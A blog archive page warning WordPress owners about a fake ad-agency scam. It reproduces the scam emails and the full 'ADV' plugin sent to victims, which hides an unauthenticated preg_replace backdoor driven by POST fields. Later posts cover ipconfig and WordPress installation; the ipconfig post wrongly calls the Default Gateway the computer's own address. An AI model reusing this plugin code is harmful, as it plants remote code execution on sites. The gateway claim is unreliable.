Category Archives: Internet

Internet, Scam, Security

WordPress Scam

3 Comments

There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment, details may change somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
4. Finally, I get this email, complete with a password:

Hi!

 

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

 

login: my other site

password: email me for password

 

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web- address

(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

 

What way of payment is suitable for you?

 

Best regards,

Mathis Gaillard.

site: www.izidaagency.com

e-mail: mgaillard@izidaagency.com

phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a php script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';}?>

_____________________________________________________________________________

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

 

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!

Internet, Security

WordPress Comment Scam

Update: This scammer is using different names. The names used that I know of are: Rayan Meyer, Killian Blanchard, Mathis Gaillard, among many others. Please read this post to understand the modus operandi and then go to the site mentioned below for even more details. Good luck!
Scams are everywhere, it seems. Yesterday I received a comment on one of my other websites. The commenter asked if I was interested in placing a banner ad (from a major company) on the site. The person apologized for making a comment instead of emailing. I realized that I didn’t have an email address on the site and this made his comment sound legitimate.

Now my site isn’t as popular as this one. It’s about kitchens, kitchenrenovation411.com , and probably isn’t a site that an advertiser would pick for a banner ad. This should have twigged me that this was a scam. However, the company that this person was supposedly going to link to the banner is a very reputable company. Maybe the clientèle from my site fit the demographics they were looking for. Hey, it’s money, right?

I emailed the person and quoted a figure then did some heavy research. It seems that this kind of thing has been going on for quite a while. Here is a site that describes the dilemma that many WordPress bloggers find themselves in and the tricks scammers use to gain access to websites: http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87842 .

Here are some tips to avoid losing your website to a scammer:

1. If it sounds too good to be true, it almost certainly is. Whenever money is involved, our eyes light up  and we start planning for the future. That’s human nature. Most WordPress sites don’t make any money at all. If someone contacts you about a site that isn’t very popular, you know it is a scam.

2. Do your research. Search Google using the complete email or comment on your blog. This will almost certainly lead to a forum or another site that the scammer has contacted. Read what has been posted and confirm that your contact is fake.

3. Advertisers don’t send their advertising code in a zip file. If you get a zip file from someone who has contacted you through your website, you know it’s got a trojan in it. The contact that I am writing about insists that they will not use any java code, simply a link to the website of the advertiser. Baloney! There will be a zip file coming, I can guarantee it.

4. Brand name companies don’t work through small advertising companies. The website of the person who contacted me looks very professional but it hasn’t been updated since 2007. The website is also exactly the same as another company listed in the link above. Both sites are identical, the only difference is the person who is sending out the emails.

5. If you’ve been taken in by this kind of scam, you should consider your website to be compromised. Links will likely take users to other sites or, worse, your site may be used to email spam. Work with your hosting company to rid your site of the malware on it.

Hopefully this post will help you avoid this type of unusual scam. This kind of thing is criminal activity and should be considered as a threat to your site as well as to your hosting company. Once this kind of thing is on a server, there are many ways for it to spread. Hopefully your host can stay on top of it.

Thanks for reading.

Hidden Windows Tricks, Internet, Router, Troubleshooting, Windows, Windows Secrets

Ipconfig

Ipconfig seems like a strange title for a post, right? Once you see how ipconfig can help you, it might lose it’s strangeness.

I’ve written about the command prompt in previous posts. Here is one https://brianmahoney.ca/?s=command+prompt  The command prompt takes you back to the days of DOS but it’s more like a window into the soul of your computer. Consider Windows/OS X the dining room of a restaurant while the command prompt is the kitchen, where the actual works gets done.

If you start a command prompt (start/programs/accessories/command prompt) then type ipconfig , you’ll see something like this:

The Command Prompt Showing Ipconfig Results
The result of typing 'ipconfig' at the command prompt.

What does all of this mean? Well, a lot of it means nothing, quite frankly, but some of it is valuable if you get stuck and have to access your router. The IPv4 number is the IP address of your current computer. The Default Gateway number is the IP address of your computer. Ignore the other numbers.

I’m assuming that almost everyone who reads this is using a router to access the Internet. If your Internet goes down or your computer seems sluggish, there are a couple of things that ipconfig can help you with. One of them is the IP address of your router. This isn’t the same as the IP address that connects  you to the Internet, it’s the one that you use to connect your computer to the router. Basically there are three IP addresses that you would encounter every day. One is the IP address that your router feeds to your computer. The other is the one that you use to access your router. The third one, which doesn’t really matter unless you want to hide it from someone, is the one that your Internet provider sends to your router to allow it to connect to the Internet. Lots of numbers!

If you have to access your router, you would type an address something like this: 192.168.0.1 into your browser.  This number is the IP address of a D-Link router. Your router probably has a different number but many are quite similar. Some use the 192.168.1.1 combination instead. Assuming that you are connected to the router, typing in the router’s IP address and a password (default is admin), you can gain access to the router’s menu. This would allow you to change different settings or simply reset your Internet connection (instead of getting up and walking over to it and powering off the powering on again).

If your computer seems to be running slowly on the Internet, typing ipconfig  /renew will refresh the IP address of your current computer. Typing ipconfig  /? displays the full menu of commands for ipconfig.

Most of us use ipconfig to renew the IP address but, as you can see, there are many more things that this command can do.

Thanks for reading!

Domain Registration, Hosting, Internet, WordPress

Buy Your Own Domain

2 Comments

Buying a domain (that’s a .com name, if you don’t know) is cheap, fast and fun. Even if you don’t know a thing about HTML or WordPress, if you’ve got a catchy name, why not register it? Sure, there are millions of domains that have been registered already, this doesn’t mean you should give up. Some people go as far as to snap up domains, locking them up before anyone else gets them. Personally, this doesn’t make a lot of sense but everyone is different. I guess if you’ve got money to tie up, maybe it makes sense.

Buying a domain means that you have it for a one year term. Many discount hosting companies offer significant discounts if you sign up for a two year or longer term. Many also give you discounts if you buy multiple domains at a time.

Right now, I would stick to the old .com domain if you’re going to try and make some money it it. People know .com, they assume that every site is a .com site and immediately head to whatever.com , even if the site is whatever.org.

In fact, when you are signing up for your domain with most companies, they will offer you all of the various combinations of your domain at the same time. Want whatever.com? How about getting whatever.org or whatever.net at the same time? The point of this, of course, is to guard against someone else stealing traffic away from your catchy name. Think of it. If you could snag google.org or google.info, you would. You’d be crazy not to.

Once you have your domain, think about doing something with it. As you might have read in past posts, I use WordPress on all of my sites. You can read about installing WordPress here and about how to set up your domain hosting here. Anything you want to know about installation and hosting is on this site, just search for the answers if you’re stuck. If I can do it, your probably can too.

Thanks for reading!

Internet, WordPress

Installing WordPress – October 28, 2011

1 Comment

Now we’re finally ready to  install WordPress. We’ve got our domain name and hosting here. We set our nameservers here. Over here, we created a database and named it. OK, looks like we’re set.

1. Download WordPress.

2. Unzip it then copy and paste the WordPress folder on to your desktop. (Put it anywhere you want but putting it on the desktop is easier for beginners.)

3. Listen carefully to this part. First you have the zip file to unzip. Inside that is a WordPress 3.x folder (depending on which version is out now). Inside that folder is a WordPress folder (just that, no number). Inside that folder are ALL the files you need to upload to the folder in your hosting account. Don’t upload the WordPress folder, just the folders and files inside the WordPress folder. Get it? Those files look like this:

Inside the WordPress Folder.
From WP-Admin to xmlrpc.php, these are the files you need.

4. Open your FTP program (I recommend FileZilla). On the left side of the window, navigate to your Desktop then to the folder that contains the WordPress files as shown above. Connect to your host using your username and password, then navigate to the folder where you want to put your files. This is the folder that is inside your root directory, right? It should be the only folder in your root directory. It should also be empty, except for the placeholder file (index.html) that we created here.

5. In the WordPress folder on the left, click on WP-Admin (the folder at the top), scroll down to the bottom , hold down the shift key and click on xmlrpc.php and click it. All of the files and folders in that WordPress folder will now be highlighted. Right click in the blue area and choose Upload.  Depending on your FTP and upload speed, this last step might take a bit of time, maybe 5 minutes or less.

6. Wait until FileZilla finishes (no more queued files). You should now have a full selection of files on the right hand side from WP-Admin to xmlrpc.php. The next step can be done in FileZilla but I prefer to do it in the File Manager on my hosting site. Do what you feel better with here.

7. You are about to edit one file. If you make a mistake, it’s not a big deal so don’t get your knickers in a knot. All that will happen is that WordPress won’t be able to install itself…yet. Even if you really screw things up, you can always delete everything inside your host folder and start over again. Relax, OK?

You are looking for the wp-config-sample.php file. This file is the one that tells WordPress what database you are using, what the password is and who the user is for that database. Remember when we did all of that here?

8. Find the wp-config-sample.php file and click on it once. On the right side of the window you will see three icons. The one you want is the ‘edit’ icon. Click it and a small window will open up or you will be taken to another page, depending on which hosting interface your host uses. Once you see inside that file, it’s full of simple text that looks really complicated, look for this section:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');

/** MySQL database username */
define('DB_USER', 'username_here');

/** MySQL database password */
define('DB_PASSWORD', 'password_here');
____________________________________________

 

9. Enter the database name, username and password of the MySQL database that we made earlier. Leave the apostrophes in, just type in the database name, user and password like this:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sitedatabase1');

/** MySQL database username */
define('DB_USER', 'joeschmoo');

/** MySQL database password */
define('DB_PASSWORD', 'goodpassword');
____________________________________________

10. In another browser window, paste this url (taken from the wp_config-sample.php file) : https://api.wordpress.org/secret-key/1.1/salt/

You will see a simple page that has information like this on it:

_______________________________________________

define('AUTH_KEY',         'G;^s;iqRh${ovHzc&n9s31-i2*U DkHI9u]#jWt&nPByL`e)cw7Zz9TJ|.c7Hu1f');
define('SECURE_AUTH_KEY',  'a|Bx@bXxFL@)1$0t]MyEvg1nt=aagDu%E9S9V>WZ<:as#)2pbY@Dv6xJv.`A>GM&');
define('LOGGED_IN_KEY',    'jFHyxThnTAu_Nxk(iHDj,|VwOQ@$V^Je: bO&c$&-IX)IGp[#Jr&F$rv9X98[dqs');
define('NONCE_KEY',        'n1P/X(*Y|ta#f1lde(gj!}L{r1{^Mu--v`fJ32)a-N1.S _4j*WBy/4!w+SvrNS-');
define('AUTH_SALT',        ')TgQ&Uj0QH?AP*+UCu]>{3{w5*(+-tL|U&]*)MhEP@YG|/dqFMVDK=-a!22&zWg+');
define('SECURE_AUTH_SALT', 'R]m:Fm*gO%Vmi^HL+_GQmd-h_,~u k,=%j^5q]b8m3[|?N[ksmfm=s%=oM]1gb1.');
define('LOGGED_IN_SALT',   'F.}Du-=]$|GBm|5tNH|haDASOu`=-Cv<RS2hKV].cNS+ex=-dX zlN6}ql)$sNz:');
define('NONCE_SALT',       '!?i5/5mjG;Fz%WxLNQEg~~+5nJiMY0yAo~T6Om%<_$&ae:{f(~Y2a}G8vQ/*&>x|');

11. Copy that information (from the word define until the last semi-colon, exactly as is shown above). Don’t use the data shown here, get your own for security’s sake.

12. In the wp-config-sample.php file, find the EXACT section the corresponds to the information on the webpage you just opened. Highlight everything from the word define down to the last semi-colon. Once that is highlighted, either right click and choose ‘paste’ or hit control and v at the same time. Either way, the info from the webpage is pasted into the file you are editing.

13. This is important, read this carefully. Just below the section we just worked on, you’ll see the section for the ‘WordPress Database Table prefix’. Locate it and find the section that reads:

_____________________________________

$table_prefix  = ‘wp_’;

____________________________________

14. Change the part between the apostrophes to some combination of numbers, letters and underscores. It will look something like this after you’re done:

______________________________________

$table_prefix  = ‘new_site143uty‘;

______________________________________

This is an important step which adds to the security of your WordPress installation. You don’t need this information but you can write it down anyway. WordPress uses it, not you.

15. Last step, usually only needed if the current settings don’t work. Farther up from where we are, you will see a section (under the section where you put the database password) that reads:

_____________________________________________

/** MySQL hostname */
define('DB_HOST', 'localhost');

_____________________________________________

Most of the time, ‘localhost’ works just fine. If it doesn’t or if you just want to be sure, you’ll have to enter the path to the MySQL database that you are using. Save the file you are editing. Head back to the control panel and go into the MySQL databases again. Click on the database that you created and somewhere there will be a ‘generate code’ button. What you are looking for is ‘your server name’. This will be something that looks like a domain name: accountname.hostmysql.com Copy this and head back to the WP-config-sample.php file, open it for editing and highlight the word localhost then paste the new .com line into that space. It will look like this:

____________________________________________

/** MySQL hostname */
define('DB_HOST', 'accountname.hostmysql.com');

____________________________________________

At this point, save the file and stretch a bit, grab a coffee or something and smile because you’re almost done. The hard part is over. It’s all fun from now on.

16. In your host’s File Manager, look up at the top of the right hand side till you find the Wp-Admin folder. Open it and look for the install.php file. Click on it then choose ‘preview’ on the right. A webpage will open up. If you’ve done everything correctly, you can install WordPress from this page. Click OK and create a username (don’t use admin, choose something different) , take the standard password that WordPress creates for you, enter your email (make sure it’s correct since there is no way to recover your password if you put in the wrong email here) then click OK.

17. Here, I do two things. I take a screen capture of the page to ensure that I have the password and username correct, then I copy and paste the password into a text file for safekeeping. OK, I write it out in a book, too.

18. Once you’ve done all of this, log in to WordPress and start creating.

These are the steps as I do them for each installation of WordPress that I’ve done. In case you are wondering, I’ve done this about twenty-four times. I hope this sounds simple and that it’s all clear to you. Most of the information here is explained in the WordPress installation area but some of it is from trial and error. One of my hosts was fine with ‘localhost’ for the database host but my current host wasn’t. I hope it works for you.

Thanks for reading! Follow me on Twitter: @_BrianMahoney